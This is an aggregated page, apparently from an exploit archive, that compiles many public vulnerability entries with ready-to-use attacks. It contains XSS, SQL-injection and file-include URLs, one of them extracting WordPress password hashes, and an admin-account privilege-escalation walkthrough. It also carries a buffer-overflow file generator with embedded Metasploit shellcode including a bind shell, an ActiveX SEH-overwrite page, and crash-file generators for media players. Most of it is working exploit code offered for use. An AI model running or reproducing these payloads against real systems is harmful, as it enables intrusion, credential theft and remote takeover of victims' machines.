HireHackking

source: https://www.securityfocus.com/bid/48087/info Nagios is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Nagios 3.2.3 is vulnerable; other versions may also be affected. http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<body onload=alert(666)>

/* source: https://www.securityfocus.com/bid/48101/info The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to trigger a kernel crash, which may result in a denial-of-service condition. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/mman.h> #define BUFSIZE getpagesize() int main(int argc, char **argv) { void *ptr; if (posix_memalign(&ptr, getpagesize(), BUFSIZE) < 0) { perror("posix_memalign"); exit(1); } if (madvise(ptr, BUFSIZE, MADV_MERGEABLE) < 0) { perror("madvise"); exit(1); } *(char *)NULL = 0; return 0; }

source: https://www.securityfocus.com/bid/48100/info Ushahidi is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Ushahidi 2.0.1 is vulnerable; prior versions may also be affected. http://www.example.com/index.php/admin/dashboard/?range=1[SQLi]

#include <stdio.h> #include <stdlib.h> #include <string.h> #define SIZE 65536 /* * Title: Sim Editor v6.6 Stack Based Buffer Overflow * Version: 6.6 * Tested on: Windows XP sp2 en, Windows 8 64-bit * Date: 16-01-2015 * Author: Osanda Malith Jayathissa * E-Mail: osanda[cat]unseen.is * Website: OsandaMalith.wordpress.com * CVE: CVE-2015-1171 */ const char shell1[] = "ba516a43ddd9e9d97424f45e33c9b1" "3231561503561583eefce2a496ab54" "46672c07cf821d15abc70ca9b88abc" "42ec3e36263830ff8d1e7f00209ed3" "c222622e17855be16ac49c1c849475" "6a3709f22e8428d424b45251fa41e9" "582bf96612d3712082e25632feadd3" "81752c32d8761e7ab749ae77c98e09" "68bce46915c73f13c142ddb382f505" "454663ce4923e7884db224a36a3fcb" "63fb7be8a7a7d891fe0d8eaee0ea6f" "0b6b187b2d36777abf4d3e7cbf4d11" "158ec6fe620f0dbb9d450fea3500da" "ae5bb331ec6530b38d9128b688deee" "2be14f9b4b566f8e262bff50d1a58b" "92"; /* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */ const char shell2[] = "bb3ff8edc8dbc6d97424f45f2bc9b1" "4a83effc315f11035f11e2ca04054e" "34f5d62fbd10e77dd9515ab2aa3457" "39feacec4fd6c345e500ed56cb8ca1" "954d70b8c9ad49731caf8e6eeffd47" "e44212ecb85e99be2ce77e744cc6d0" "0317c8d3c02341cc050f1b67fdfb9a" "a1cc04ad8d823a0100db7ba6fbae77" "d486a843a65c3d560016e5b2b0fb73" "30beb0f01ea347d514dfccd8fa6996" "fede324c9f479f23a098479b04d26a" "c831b9e23d7342f3290431c1f6bedd" "697e18198d55dcb570561c9fb6024c" "b71f2b07479ffe87170f5167c8ef01" "0f02e07e2f2d2a179e098670e2ad38" "dd6b4b50cd3dc3cd2f1adc6a4f4970" "22c7c69ef4e8d7b45644705f2d8645" "7e3283ee17a5597e55575dab0f97cb" "5786c06355ff272ca62a3ce532952b" "0ad215ac5cb815c4389845f14635fa" "aad2b5ab1f74dd5179b242a9ac42bf" "7c89c0c90af908"; const char *shells[] = { shell1, shell2 }; const char *shell_names[] = { "MS Paint", "Bind Shell" }; const char *shell_info[] = { "", "[*] Connect on port 4444\n" }; const size_t SHELLS_COUNT = 2; int menu() { size_t shell_type = SHELLS_COUNT; puts("\b[?] Choose an Option: "); size_t i; for (i = 0; i < SHELLS_COUNT; i++) printf("%d. %s\n", i, shell_names[i]); scanf("%i", &shell_type); return shell_type; } void banner() { static const char banner[] = " _____ _ _____ _ _ _ \n" "| __|_|_____ | __|_| |_| |_ ___ ___ \n" "|__ | | | | __| . | | _| . | _|\n" "|_____|_|_|_|_| |_____|___|_|_| |___|_|\n" "\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n" "[~] Author: Osanda Malith Jayathissa\n" "[~] E-Mail: osanda[cat]unseen.is\n" "[~] Website: OsandaMalith.wordpress.com\n\n"; fwrite(banner, sizeof(char), sizeof(banner) , stdout); } void patternfill(char *dst, char *pattern, size_t count, size_t dst_size) { size_t pattern_len = strlen(pattern); count *= pattern_len; if (count > dst_size) count = dst_size; if (pattern_len > dst_size) pattern_len = dst_size; size_t i, pI; for (i = 0, pI = 0; i < count ; i++, pI++) { if (pI == pattern_len) pI = 0; dst[i] = pattern[pI]; } } int main() { banner(); int shell_type = menu(); if (shell_type >= SHELLS_COUNT) { printf("[-] Enter a valid input\n"); exit (1); } char *buff = (char*) calloc (SIZE, sizeof(char)); char *nops = (char*) calloc (SIZE, sizeof(char)); if (!buff || !nops) exit (1); patternfill(buff, "41", 405, SIZE); patternfill(nops, "90", 16, SIZE); char ret[] = "B3804200"; const char* filename = "exploit.sms"; FILE *outfile = fopen(filename, "w"); if (!outfile) { printf("%s\n","Could not open file"); exit (1); } fputs(buff, outfile); fputs(ret, outfile); fputs(nops, outfile); fputs(shells[shell_type], outfile); printf("%s", shell_info[shell_type]); fclose(outfile); free(buff); printf("[+] Successfully to written to: \"%s\"\n", filename); return 0; } /*EOF*/

<html> <!-- Samsung SmartViewer BackupToAvi Remote Code Execution PoC PoC developed by Praveen Darshanam For more details refer http://darshanams.blogspot.com http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html Original Vulnerability Discovered by rgod Vulnerable: Samsung SmartViewer 3.0 Tested on Windows 7 Ultimate N SP1 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265 --> <object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object> <script > var payload_length = 15000; var arg1=1; var arg2=1; var arg3=1; //blank strings var junk = ""; var buf1 = ""; var buf2 = ""; //offset to SE is 156, initial analysis using metasploit cyclic pattern for (i=0; i<156; i++) { buf1 += "A"; } var nseh = "DD"; var seh = "\x87\x10"; //from Vulnerable DLL junk = buf1 + nseh + seh; //remaining buffer for (j=0; j<(payload_length-junk.length); j++) { buf2 += "B"; } //final malicious buffer var fbuff = junk + buf2; target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff); </script> </html>

# Exploit Title: Pie Register 2.0.13 Privilege escalation # Date: 16-10-2014 # Software Link: https://wordpress.org/plugins/pie-register/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # CVE: CVE-2014-8802 # Category: webapps 1. Description Anyone can import CSV file. Pie Register will import users from this file. File: pie-register\pie-register.php add_action( 'init', array($this,'pie_main') ); function pie_main() { // I skip unnecessary lines if(isset($_FILES['csvfile']['name'])) { $this->importUsers(); } } http://security.szurek.pl/pie-register-2013-privilege-escalation.html 2. Proof of Concept Create CSV file based on given example: "Username","Display name","E-mail","User Registered","First Name","Last Name","Nickname","Role" "hack","Hacked","hacked@hacked.hacked","2010-10-10 20:00:00","Hacked","Hacked","Hacked","administrator" Import account using: <form method="post" action="http://wordpress-instalation" enctype="multipart/form-data"> Input CSV<input type="file" name="csvfile"> <input type="submit" value="Add user!"> </form> Create another standard account using wp-login.php?action=register. After login go to wp-admin/profile.php and search "uid" in page source. Number after "uid" is our current account id. For example: "uid":"123". We can assume that previously imported admin account has id-1 (or id-x where x is natural number). We can activate this account using: <form method="post" action="http://wordpress-instalation"> <input type="hidden" name="verifyit" value="1"> Account id:<input type="text" name="vusers[]" value=""> <input type="submit" value="Activate user!"> </form> Finally we can reset password using: http://wordpress-instalation/wp-login.php?action=lostpassword 3. Solution: Update to version 2.0.14 https://downloads.wordpress.org/plugin/pie-register.2.0.14.zip

source: https://www.securityfocus.com/bid/48106/info vBulletin vBExperience is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. vBulletin vBExperience 3.0 is vulnerable; other versions may also be affected. http://www.example.com/[path]/xperience.php?sortfield=xr&sortorder="><script>alert(1);</script>

source: https://www.securityfocus.com/bid/48108/info http://www.noticeboardpro.com/notice-board-pro-copyright.htmlJoomla CCBoard is prone to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data. Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_ccboard&view=postlist&forum=1&topic=2

# Exploit Title : Winamp 5.666 build 3516 'f263.w5s' (Corrupted flv) Crash POC # Product : Winamp 5.666 build 3516 # Date : 12.12.2014 # Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/ # Software Link : http://winampplugins.co.uk/Winamp/ # Vulnerable version : Winamp 5.666 build 3516 (Latest at the moment) and probably previous versions # Vendor Homepage : http://www.winamp.com/ # Tested on : Winamp 5.666 build 3516 installed on Windows 7 x64 # CVE : unknown at the moment #============================================================================================ # Open created POC file (fault.flv) with Winamp # Details #(7714.ac58): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #f263!GetWinamp5SystemComponent+0x1951: #08572f15 0fb601 movzx eax,byte ptr [ecx] ds:002b:e54d18b6=?? #0:021:x86> u eip #f263!GetWinamp5SystemComponent+0x1951: #08572f15 0fb601 movzx eax,byte ptr [ecx] #08572f18 0fb67901 movzx edi,byte ptr [ecx+1] #08572f1c c1e008 shl eax,8 #08572f1f 0bc7 or eax,edi #08572f21 0fb67902 movzx edi,byte ptr [ecx+2] #08572f25 0fb64903 movzx ecx,byte ptr [ecx+3] #08572f29 c1e008 shl eax,8 #08572f2c 0bc7 or eax,edi #!/usr/bin/python flvheader=("\x46\x4C\x56\x01\xC5\x00\x00\x00\x09\x00\x00\x00\x00") flvscripdatatag1 = ("\x12\x00\x02\x76\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0A\x6F\x6E\x4D\x65\x74\x61\x44\x61\x74\x61\x08\x00\x00\x00\x1C\x00\x0B\x68\x61\x73\x4D\x65\x74\x61\x64\x61\x74\x61\x01\x01\x00\x08\x68\x61\x73\x56\x69\x64\x65\x6F\x01\x01\x00\x08\x68\x61\x73\x41\x75\x64\x69\x6F\x01\x01\x00\x08\x64\x75\x72\x61\x74\x69\x6F\x6E\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x0D\x6C\x61\x73\x74\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x15\x6C\x61\x73\x74\x6B\x65\x79\x66\x72\x61\x6D\x65\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x77\x69\x64\x74\x68\x00\x40\x89\x00\x00\x00\x00\x00\x00\x00\x06\x68\x65\x69\x67\x68\x74\x00\x40\x82\xC0\x00\x00\x00\x00\x00\x00\x0D\x76\x69\x64\x65\x6F\x64\x61\x74\x61\x72\x61\x74\x65\x00\x40\xBA\x2F\x4B\x7A\x6F\x4D\xEA\x00\x09\x66\x72\x61\x6D\x65\x72\x61\x74\x65\x00\x40\x35\xBD\x37\xA6\xF4\xDE\x9C\x00\x0D\x61\x75\x64\x69\x6F\x64\x61\x74\x61\x72\x61\x74\x65\x00\x40\x55\xDD\xD3\x7A\x6F\x4D\xEA\x00\x0F\x61\x75\x64\x69\x6F\x73\x61\x6D\x70\x6C\x65\x72\x61\x74\x65\x00\x40\xD5\x88\x80\x00\x00\x00\x00\x00\x0F\x61\x75\x64\x69\x6F\x73\x61\x6D\x70\x6C\x65\x73\x69\x7A\x65\x00\x40\x30\x00\x00\x00\x00\x00\x00\x00\x06\x73\x74\x65\x72\x65\x6F\x01\x00\x00\x08\x66\x69\x6C\x65\x73\x69\x7A\x65\x00\x40\xE3\xE1\x00\x00\x00\x00\x00\x00\x09\x76\x69\x64\x65\x6F\x73\x69\x7A\x65\x00\x40\xE3\x47\x20\x00\x00\x00\x00\x00\x09\x61\x75\x64\x69\x6F\x73\x69\x7A\x65\x00\x40\x80\x78\x00\x00\x00\x00\x00\x00\x08\x64\x61\x74\x61\x73\x69\x7A\x65\x00\x40\x85\x18\x00\x00\x00\x00\x00\x00\x0F\x6D\x65\x74\x61\x64\x61\x74\x61\x63\x72\x65\x61\x74\x6F\x72\x02\x00\x0D\x66\x6C\x76\x6D\x65\x74\x61\x20\x31\x2E\x31\x2E\x32\x00\x0C\x6D\x65\x74\x61\x64\x61\x74\x61\x64\x61\x74\x65\x0B\x42\x74\xAF\x38\x0D\x3D\x00\x00\x00\x00\x00\x0C\x61\x75\x64\x69\x6F\x63\x6F\x64\x65\x63\x69\x64\x00\x3F\xF0\x00\x00\x00\x00\x00\x00\x00\x0C\x76\x69\x64\x65\x6F\x63\x6F\x64\x65\x63\x69\x64\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x61\x75\x64\x69\x6F\x64\x65\x6C\x61\x79\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x0C\x63\x61\x6E\x53\x65\x65\x6B\x54\x6F\x45\x6E\x64\x01\x01\x00\x0C\x68\x61\x73\x43\x75\x65\x50\x6F\x69\x6E\x74\x73\x01\x00\x00\x09\x63\x75\x65\x50\x6F\x69\x6E\x74\x73\x0A\x00\x00\x00\x00\x00\x0C\x68\x61\x73\x4B\x65\x79\x66\x72\x61\x6D\x65\x73\x01\x01\x00\x09\x6B\x65\x79\x66\x72\x61\x6D\x65\x73\x03\x00\x05\x74\x69\x6D\x65\x73\x0A\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0D\x66\x69\x6C\x65\x70\x6F\x73\x69\x74\x69\x6F\x6E\x73\x0A\x00\x00\x00\x01\x00\x40\x85\xC0\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x09\x00\x00\x02\x81") flvscripdatatag2 = ("\x12\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0C\x6F\x6E\x4C\x61\x73\x74\x53\x65\x63\x6F\x6E\x64\x08\x00\x00\x00\x00\x00\x00") flvvideotag = ("\x09\x00\x00\x00\x22\x09\x00\x00\x9E\x00\x00\x00\x00\x00\x00\x00\x12\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x9A\x39") flvaudiotag = ("\x08\x00\x02\x04\x00\x00\x2E\x00\x00\x00\x00\x1A\xBF\xB7\x12\x40\x01\x00\x30\xC2\x3B\x32\x00\xBA\xFD\x6A\x92\x88\x8C\x03\xA9\x38\x02\x89\xA9\x0B\xBD\xE8\x8C\x80\x23\x04\x2C\xE8\xBB\x30\x99\xA3\x2F\xA8\x02\x28\x11\xC2\x8F\x89\xA7\x19\x28\xB0\x99\x40\x40\xB8\x8F\xC1\x02\x41\x12\x08\xC8\x12\x70\x80\x88\x18\xA4\x61\x12\x08\x29\x11\xC2\x21\x3A\x80\x17\x33\x3B\x1A\xF8\x08\x80\x74\x80\x89\x80\xBA\x48\x96\x0B\xA8\x92\x32\x12\x70\x89\xA0\x8A\x25\x28\x82\x98\x3F\xB0\x01\x08\x89\x2E\x90\x90\x01\xBA\x79\xB9\x99\x47\x19\x01\x09\x9B\xBD\xA7\x20\x8A\x9B\x84\x98\x4A\xB4\x1D\xA9\x02\x50\x14\x1C\x81\x90\x29\x02\xAA\xD9\x9C\x12\xD8\x10\x1A\x37\x9A\x20\xDB\xB8\x1C\x13\x86\x28\x89\x13\x09\x9D\xB0\x01\x2A\xD8\xA2\x5C\xB9\x82\xCE\x12\x36\x0A\x99\x01\x82\x08\x02\x61\x93\x71\x08\xBB\x11\x10\x33\x27\x32\x19\x08\xA2\x11\x8F\x06\x99\x18\x81\xDB\x89\x0B\x93\x00\x19\x09\xF2\x3C\xA8\xD8\x08\x18\x17\x8B\x80\x9A\x3C\xF8\x00\x99\xBF\xA0\x08\x91\x8A\x29\x98\xF9\x40\xC9\x0C\x81\xBC\x90\x19\xA2\x59\xC8\x9A\x18\xE0\x08\x0C\xB2\x1B\x37\x00\x0B\x90\x01\x00\x41\xB8\x79\xB2\x9C\x53\x10\x8B\x50\x92\x39\xA0\x98\x73\x42\x43\xAA\x40\x81\x9A\x34\xA8\x53\x87\x48\xA9\xA8\x8A\x96\x10\x23\x19\x94\x00\x43\x88\x3B\x17\x00\x34\x00\x42\x8B\xC0\x10\x01\x89\x65\x89\x30\x24\xA0\x2F\xB2\x89\x88\x8B\xA4\x1C\x81\x93\x49\x99\xCC\xA0\xB8\x8F\xBA\xC2\x2C\x34\x92\x2D\xA2\x0A\x40\x91\x28\xAF\xC8\x03\x18\x29\xFB\x8A\x98\x22\x85\x2C\xAB\xB8\x89\x8C\xA1\x13\xA8\x4D\x87\x8C\x08\x93\x8A\x31\xC9\x19\x26\x88\x29\x22\xEA\x90\x72\x02\x99\x2A\xA1\x92\x79\x04\xAC\x21\x85\x8A\x20\x00\xA2\x11\x09\x44\xBD\xA8\x88\x1A\xB0\x8C\x91\x13\x29\xDB\x8B\xF8\xA9\x40\x61\xF9\x00\x99\x98\x00\x8C\xD8\x20\xB8\x0A\x11\xFC\x0A\xC9\x88\x09\x93\x3A\x01\x9A\xEA\xC0\x0F\x10\x02\x99\x3C\xC0\x9B\x38\xB7\x0B\x99\x99\xF8\x43\x09\x80\x99\x92\x22\x45\x19\x89\xDB\x02\x28\x10\xD0\x20\x12\xB1\xBD\x05\x10\x79\x05\x89\x10\x81\x0C\xB2\x80\x61\x98\x08\x30\xB6\x19\x44\x98\x3A\x98\x82\x18\x76\x09\x10\x91\xCC\x22\xA1\x3A\x09\x92\x9A\x49\xDB\xC8\x31\x12\xC1\x0D\x0A\x83\x01\x70\xA6\x8B\x3A\xA3\x9B\x40\x92\x80\x59\xB2\xAC\x8E\x91\xB9\x10\x20\xBF\x80\xA0\x93\x2C\x0B\x86\x0C\xB1\x41\x84\xA0\x00\x00\x02\x0F") pocdata = [flvheader,flvscripdatatag1,flvscripdatatag2,flvvideotag,flvaudiotag] flvfile = "fault.flv" file = open(flvfile,"wb") file.write(''.join(pocdata)) file.close()

# Exploit Title : jetAudio 8.1.3 Basic Use-after-free (Corrupted mp4) Crash POC # Product : jetAudio Basic # Date : 12.12.2014 # Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/ # Software Link : http://www.jetaudio.com/download/ # Vulnerable version : 8.1.3 (Latest at the moment) and probably previous versions # Vendor Homepage : http://www.jetaudio.com/ # Tested on : jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86 # CVE : unknown at the moment #============================================================================================ # Open created POC file (fault.mp4) with jetAudio # Details # (6e74.6e20): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. #JFDSPL!JPluginCreate+0x338f8: #0a1a7588 8b11 mov edx,dword ptr [ecx] ds:002b:050aacf8=???????? #0:000:x86> kb #ChildEBP RetAddr Args to Child #WARNING: Stack unwind information not available. Following frames may be wrong. #0018feec 72512466 00000000 00000000 00000000 JFDSPL!JPluginCreate+0x338f8 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for JetAudio.exe - #0018ff00 005961ba 00000000 f9b7337c 00000000 MSVCR90!exit+0x11 #0018ff88 7558338a 7efde000 0018ffd4 771e9f72 JetAudio!CxIOFile::~CxIOFile+0x19414a #0018ff94 771e9f72 7efde000 765bba31 00000000 kernel32!BaseThreadInitThunk+0xe #0018ffd4 771e9f45 00596315 7efde000 00000000 ntdll32!__RtlUserThreadStart+0x70 #0018ffec 00000000 00596315 7efde000 00000000 ntdll32!_RtlUserThreadStart+0x1b #0:000:x86> u 0a1a7588 #JFDSPL!JPluginCreate+0x338f8: #0a1a7588 8b11 mov edx,dword ptr [ecx] #0a1a758a 8b420c mov eax,dword ptr [edx+0Ch] #0a1a758d 6a01 push 1 #0a1a758f 6870ff1d0a push offset JFDSPL!CxIOFile::~CxIOFile+0x303e0 (0a1dff70) #0a1a7594 ffd0 call eax #0a1a7596 6aff push 0FFFFFFFFh #0a1a7598 6a00 push 0 #0a1a759a 8d8e043d0000 lea ecx,[esi+3D04h] #============================================================================================ #!/usr/bin/python pocdata=("\x00\x00\x00\xFA\x66\x74\x79\x70\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x00\x00\x00\x00\x6D\x70\x34\x32\x69\x73\x6F\x6D\x61\x76\x63\x31\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x6D\x70\x34\x32\x00\x00") mp4file = "fault.mp4" file = open(mp4file,"w") file.write(pocdata) file.close()

source: https://www.securityfocus.com/bid/48109/info Nakid CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Nakid CMS 1.0.2 is vulnerable; other versions may also be affected. http://www.example.com/cms/assets/addons/kcfinder/browse.php?CKEditorFuncNum=0);alert(0);//

source: https://www.securityfocus.com/bid/48110/info Multiple WordPress WooThemes (Live Wire) are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/wp-content/themes/_theme's_name_/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

source: https://www.securityfocus.com/bid/48113/info PopScript is prone to a remote file-include vulnerability, an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. http://www.example.com/PopScript/index.php?act=inbox&mode=1 [ SQL injection ] http://www.example.com/index.php?mode=[Shell txt]?&password=nassrawi&remember=ON

source: https://www.securityfocus.com/bid/48118/info Squiz Matrix is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Squiz Matrix 4.0.6 and 4.2.2 are vulnerable; other versions may also be affected. http://www.example.com/__lib/html_form/colour_picker.php?colour=';%20alert(document.cookie);%20var%20x='&pickerid=000000

source: https://www.securityfocus.com/bid/48132/info BLOG:CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. BLOG:CMS 4.2.1.f is vulnerable; other versions may also be affected. http://www.example.com/blogcms/photo/index.php?"<script>alert(0x0029A)</script> http://www.example.com/blogcms/photo/index.php?"<script>alert(&#039;XSS&#039;);</script> http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(&#039;XSS&#039;);</script> http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(0x0029A)</script> http://www.example.com/blogcms/admin/plugins/mailtoafriend/mailfriend.php

source: https://www.securityfocus.com/bid/48126/info Xataface is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. NOTE (July 4, 2011): The vendor indicates that this issue affects versions prior to Xataface 1.2.6, while the reporter indicates 1.3rc1 and 1.3rc2 are affected. http://www.example.com/index.php?-action=../../../../../../etc/passwd%00

source: https://www.securityfocus.com/bid/48166/info The GD Star Rating plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0x535242,1,1,co ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0x20,2000)),1,2000),0x223b7d),1,1,1+limit+1

source: https://www.securityfocus.com/bid/48167/info The Perl Data::FormValidator module is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information. Data::FormValidator 4.66 is vulnerable; other versions may also be affected. #!/opt/perl/5.12/bin/perl use strict; use warnings; use Data::FormValidator; "some_unrelated_string" =~ m/^.*$/; my $profile = { untaint_all_constraints => 1, required => [qw(a)], constraint_methods => { a => qr/will_never_match/, }, }; my $results = Data::FormValidator->check({ a => 1 }, $profile); warn $results->valid('a');

source: https://www.securityfocus.com/bid/48215/info The Pacer Edition CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The Pacer Edition CMS RC 2.1 is vulnerable; prior versions may also be affected. <html> <title>Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability</title> <body bgcolor="#1C1C1C"> <script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script> <form action="http://www.example.com/admin/login/forgot/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss"> <input type="hidden" name="url" value="1" /> <input type="hidden" name="email" value=&#039;%F6"+onmouseover=prompt(31337)&#039; /> <input type="hidden" name="button" value="Send%20Details" /> </form> <a href="javascript: xss1();" style="text-decoration:none"> <b><font color="red"><center><h3><br /><br />Exploit!<h3></center></font></b></a> </body> </html>

source: https://www.securityfocus.com/bid/48389/info Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error. An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition. Wireshark 1.4.5 is vulnerable. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35873.pcap

source: https://www.securityfocus.com/bid/48217/info Tolinet Agencia is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/index.php?tip=art&id=2' <- blind sql

